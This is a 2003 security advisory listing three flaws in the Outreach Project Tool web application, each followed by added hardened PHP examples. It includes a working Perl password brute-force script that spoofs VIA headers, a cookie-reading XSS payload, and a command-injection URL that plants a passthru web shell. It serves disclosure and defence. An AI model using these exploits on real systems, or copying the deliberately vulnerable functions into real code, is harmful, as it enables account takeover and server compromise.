[UNIX] Outreach Project Tool Multiple Vulnerabilities

From: support@securiteam.com
Date: 01/18/03

    From: support@securiteam.com
    To: list@securiteam.com
    Date: 18 Jan 2003 10:21:19 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security would like to welcome Tiscali World Online
    to our service provider team.
    For more info on their service offering IP-Secure,
    please visit http://www.worldonline.co.za/services/work_ip.asp
    - - - - - - - - -

      Outreach Project Tool Multiple Vulnerabilities
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.lanifex.com/business/business_en/products/815.html> The
    Outreach Project Tool was developed by CSO Lanifex GmbH to support
    communication with customers during project implementation. It has rapidly
    evolved into a highly effective Web-based collaboration system, which
    improves interaction between consultants and their clients, as well as a
    wide range of other applications.

    The product has been found to contain three security vulnerabilities.

    DETAILS

    1) Request - Header Tarpit
    The function "OPT_remote_IP()" (/opt/general.php) reads the "X_FORWARDED_FOR"
    and "VIA" environment variables.

    This is done to identify possible proxy servers. Unfortunately these
    variables are populated from the HTTP request headers, which the client
    controls. The following HTTP request:
    ---*---
    GET /opt/whatever HTTP/1.1
    Host: whatever
    VIA: 1.2.3.4
    ---*---

    will cause the value of "$HTTP_VIA" (here 1.2.3.4) to be used as the user's IP.

    Thus leading to:
     - Anonymous use of the application
     - Brute-force attack against user accounts

    Exploit:
    Simple example for a brute-force attack against OPT:
    #!/usr/bin/perl
    # Tries every password in file $pf for user $uid; each request carries a
    # random VIA header so the server records a different client IP each time.
    use LWP::UserAgent;
    use HTTP::Request::Common;
    use HTTP::Response;
    my ($url,$uid,$pf) = @ARGV;
    open(P,"< $pf") || die "passf.?\n";
    my $ua = LWP::UserAgent->new(requests_redirectable => ['POST']); # carefully !
    while(<P>){ my $pwd = $_; chomp($pwd);
    my %h = ( VIA => (rand(255)%255).".".(rand(255)%255).".".(rand(255)%255).".".(rand(255)%255) );
    my $res = $ua->request(HEAD "$url?lang=0&justlogged=1&username=$uid&password=$pwd&tz=+0200&button=Login now",%h);
    my $hds = $res->headers; my $new = $hds->header("Location");
    my $res2 = $ua->request(GET "$new",%h); $res2 = $ua->request(GET "$new",%h); # strange db-redirect stuff ?!!
    my $cod = $res2->code;
    my $pag = $res2->content;
    print "$uid:$pwd ".(($cod =~ /20\d/ && $pag !~ /is invalid/ig)?"\tYES":'')."\n"; }
    close (P);
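    The underlying defect is that a client-supplied header replaces the TCP peer address, so per-address throttling and logging key on a value the client chooses. The following PHP is an added example written for this advisory, not Lanifex's OPT_remote_IP(); it assumes the $_SERVER keys PHP fills from request headers, and the trusted-proxy list, the documentation addresses and the login_allowed() throttle are constructed for the demonstration.

```php
<?php
// Added example (not OPT's code): deriving the client address without
// letting the client pick it via Via / X-Forwarded-For. $_SERVER keys are
// the ones PHP fills from request headers; the trusted-proxy list is a
// hypothetical configuration value.

// Pattern the advisory describes: a client-supplied header wins over the
// TCP peer address, so every request can claim a different origin.
function remote_ip_vulnerable(array $server): string
{
    if (!empty($server['HTTP_X_FORWARDED_FOR'])) {
        return trim(explode(',', $server['HTTP_X_FORWARDED_FOR'])[0]);
    }
    if (!empty($server['HTTP_VIA'])) {
        return trim($server['HTTP_VIA']);
    }
    return $server['REMOTE_ADDR'] ?? '';
}

// Hardened: REMOTE_ADDR is authoritative unless it is one of our own
// reverse proxies. Only then is X-Forwarded-For consulted, and only the
// rightmost hop that is not one of our proxies, i.e. the address our edge
// proxy actually saw connecting. A value that is not an IP is ignored.
function remote_ip_hardened(array $server, array $trustedProxies): string
{
    $peer = $server['REMOTE_ADDR'] ?? '';
    if (!in_array($peer, $trustedProxies, true)) {
        return $peer;                 // direct client: its headers are untrusted
    }
    $xff = $server['HTTP_X_FORWARDED_FOR'] ?? '';
    if ($xff === '') {
        return $peer;
    }
    $hops = array_map('trim', explode(',', $xff));
    for ($i = count($hops) - 1; $i >= 0; $i--) {
        if (in_array($hops[$i], $trustedProxies, true)) {
            continue;                 // skip hops our own proxies appended
        }
        return filter_var($hops[$i], FILTER_VALIDATE_IP) !== false ? $hops[$i] : $peer;
    }
    return $peer;
}

// Per-address login throttle keyed on the resolved address. With the
// vulnerable resolver every attempt can land under a new key.
function login_allowed(array &$attempts, string $ip, int $limit = 5): bool
{
    $attempts[$ip] = ($attempts[$ip] ?? 0) + 1;
    return $attempts[$ip] <= $limit;
}

// Constructed request data (RFC 5737 documentation addresses).
$trusted = ['10.0.0.5'];                          // hypothetical reverse proxy
$direct  = [
    'REMOTE_ADDR'          => '203.0.113.10',
    'HTTP_VIA'             => '1.2.3.4',
    'HTTP_X_FORWARDED_FOR' => '198.51.100.77',
];
$viaProxy = [
    'REMOTE_ADDR'          => '10.0.0.5',
    'HTTP_X_FORWARDED_FOR' => '1.2.3.4, 203.0.113.10',
];

printf("vulnerable, direct client : %s\n", remote_ip_vulnerable($direct));
printf("hardened,   direct client : %s\n", remote_ip_hardened($direct, $trusted));
printf("hardened,   behind proxy  : %s\n", remote_ip_hardened($viaProxy, $trusted));

// Six login attempts from the same peer, each with a fresh header value:
// the vulnerable resolver files each one under the spoofed address, the
// hardened one counts them all under 203.0.113.10.
$vulnCounts = $hardCounts = [];
for ($n = 1; $n <= 6; $n++) {
    $req = $direct;
    $req['HTTP_X_FORWARDED_FOR'] = "198.51.100.$n";
    $v = login_allowed($vulnCounts, remote_ip_vulnerable($req));
    $h = login_allowed($hardCounts, remote_ip_hardened($req, $trusted));
    printf("attempt %d: vulnerable=%s hardened=%s\n",
        $n, $v ? 'allowed' : 'blocked', $h ? 'allowed' : 'blocked');
}
```

    Logging both REMOTE_ADDR and the raw forwarding headers side by side is also worth doing: a stream of logins whose forwarded address changes on every request while the peer address stays constant is exactly the pattern the script above produces.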

    2) Several XSS Vulnerabilities
    Typical XSS vulnerabilities exist in many/most of the community functions.

    Example:
    Once logged in, go to "Notes -> News -> Ad News". Then create a News
    item containing the following script tag:
    hello i am a news thing .. < script> alert(document.cookie); </script>

    Every user who views it will now get an alert window showing their
    session ID. Once logged in, this vulnerability makes it possible to
    steal any other user's account (administrator included).
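    The fix for stored XSS of this kind is to encode every stored value at the point it is written into HTML, and to keep the session ID out of document.cookie so that a script which does run cannot read it. The PHP below is an added example for this advisory, not OPT's news code; the item array shape, the function names and the sample item are constructed.

```php
<?php
// Added example (not OPT's code): rendering user-submitted news items so
// that injected markup is displayed as text, plus session-cookie settings
// that keep the session id out of document.cookie. The item array shape
// and function names are hypothetical.

// Encode for an HTML text node or a double-quoted attribute value.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Pattern behind the advisory's finding: stored text echoed verbatim.
function render_news_vulnerable(array $item): string
{
    return '<h3>' . $item['title'] . '</h3><p>' . $item['body'] . '</p>';
}

// Hardened: every dynamic value is encoded where it enters the markup,
// including the attribute value, which needs ENT_QUOTES to be safe.
function render_news_hardened(array $item): string
{
    return '<div class="news" data-id="' . h((string) $item['id']) . '">'
         . '<h3>' . h($item['title']) . '</h3>'
         . '<p>' . h($item['body']) . '</p>'
         . '</div>';
}

// Defence in depth for the cookie-theft consequence: an HttpOnly session
// cookie is not readable from script. Must run before session_start().
function harden_session_cookie(): void
{
    ini_set('session.cookie_httponly', '1');
    ini_set('session.use_only_cookies', '1');
    ini_set('session.use_trans_sid', '0');
    ini_set('session.cookie_samesite', 'Lax');   // PHP 7.3 and later
}

// Constructed sample item carrying the tag from the advisory.
$item = [
    'id'    => 7,
    'title' => 'Release notes',
    'body'  => 'hello i am a news thing .. <script>alert(document.cookie);</script>',
];

$vuln = render_news_vulnerable($item);
$safe = render_news_hardened($item);
echo $vuln, "\n", $safe, "\n";

// Regression check a reviewer can keep: no raw tag survives encoding.
assert(strpos($safe, '<script') === false);
assert(strpos($safe, '&lt;script&gt;') !== false);
```

    The two calls in the output differ only in the body: the vulnerable renderer emits the tag as markup, the hardened one emits it as visible text. The session settings do not stop the script from running; they remove the payoff the advisory describes.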

    3) Setup issues (/opt/setup)
    If the lockfile "lock01" is present in the setup_lock directory (because
    it was not removed after installation, or because someone is able to
    create a file named "lock01" there), then the following is possible:

    A) Create a new environment setup
    B) Execute system commands through the setup.php script.

    The second option is due to the fact that the "temp_CRM_dir" parameter is
    passed directly to the PHP exec() function.

    Exploit:
    http://localhost/opt/setup/setup.php
    ?CRM_email=opti@localhost
    &CRM_system_email=mei@localhost
    &CRM_path=/disk2/apps/opt/OPT_0.946b/opt
    &CRM_db_host=localhost&CRM_db_uname=opt
    &CRM_db_pwd=opt
    &CRM_db_db=opt
    &CRM_may_demo=0
    &temp_CRM_dir=a;echo+-e+%5c074?passthru%5c050%5c044c%5c051?%5c076+%3E+bad.php;
    &CRM_mail_fname=OPT_incoming_mail
    &action=Set up my OPT server

    The above request will create a script called "bad.php" with the content
    <?passthru($c)?> in the OPT setup directory.

    Recommended Hotfixes:
    After installation, check whether the file "lock01" exists in the
    setup_lock directory. If it exists, remove it.
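    The two defects in this section are a setup step that stays reachable while a token file exists and a directory name that is spliced into a shell command. The PHP below is an added example written for this advisory, not OPT's own setup.php; the setup_lock/lock01 layout follows the advisory, while the function names, the base directory and the sample parameter values are constructed.

```php
<?php
// Added example (not OPT's own setup.php): the setup step is gated on the
// lock01 token from the advisory and the temp_CRM_dir parameter never
// reaches a shell. The setup_lock/lock01 layout follows the advisory;
// function names and the base directory are hypothetical.

// Pattern the advisory describes: the request parameter is spliced into a
// shell command, so a ';' in it terminates the command and starts another.
function make_temp_dir_vulnerable(string $tempDir): void
{
    exec('mkdir -p ' . $tempDir);
}

// Hardened: accept only a plain directory name (no separators, no leading
// dot, so no '..'), anchor it under a fixed base, and create it with
// mkdir() so there is no shell to inject into.
function validate_temp_dir(string $raw, string $base): ?string
{
    if (!preg_match('/^[A-Za-z0-9][A-Za-z0-9_.-]{0,63}$/', $raw)) {
        return null;
    }
    $realBase = realpath($base);
    if ($realBase === false || !is_dir($realBase)) {
        return null;
    }
    return $realBase . DIRECTORY_SEPARATOR . $raw;
}

// If an external command is unavoidable, the argument must be quoted so
// the whole value is passed as a single word.
function quoted_command(string $tempDir): string
{
    return 'mkdir -p ' . escapeshellarg($tempDir);
}

function run_setup(array $request, string $lockFile, string $base): string
{
    // Setup is only reachable while the installer's lock01 token exists;
    // the hotfix in the advisory is to delete it once installation is done.
    if (!is_file($lockFile)) {
        return 'setup disabled: ' . basename($lockFile) . ' not present';
    }
    $dir = validate_temp_dir((string) ($request['temp_CRM_dir'] ?? ''), $base);
    if ($dir === null) {
        return 'rejected temp_CRM_dir';
    }
    if (!is_dir($dir) && !mkdir($dir, 0750, true)) {
        return 'could not create ' . $dir;
    }
    return 'temp dir ready: ' . $dir;
}

// Constructed inputs: a simplified injection attempt and a benign name.
$base   = sys_get_temp_dir();
$lock   = $base . '/setup_lock/lock01';
$attack = ['temp_CRM_dir' => 'a; echo hi > bad.php'];
$benign = ['temp_CRM_dir' => 'opt_tmp'];

echo run_setup($attack, $lock, $base), "\n";
echo run_setup($benign, $lock, $base), "\n";
echo validate_temp_dir($attack['temp_CRM_dir'], $base) ?? 'rejected', "\n";
echo validate_temp_dir($benign['temp_CRM_dir'], $base), "\n";
echo quoted_command($attack['temp_CRM_dir']), "\n";
```

    Run as is, both run_setup() calls stop at the lock check because no lock01 exists under the temp directory; the direct validate_temp_dir() calls show the injection string being rejected and the plain name being resolved under the base directory. Because the web server process must not be able to create lock01 itself, the setup_lock directory should be owned by an account other than the one PHP runs as.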

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:martin@websec.org> Martin
    Eiszner.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


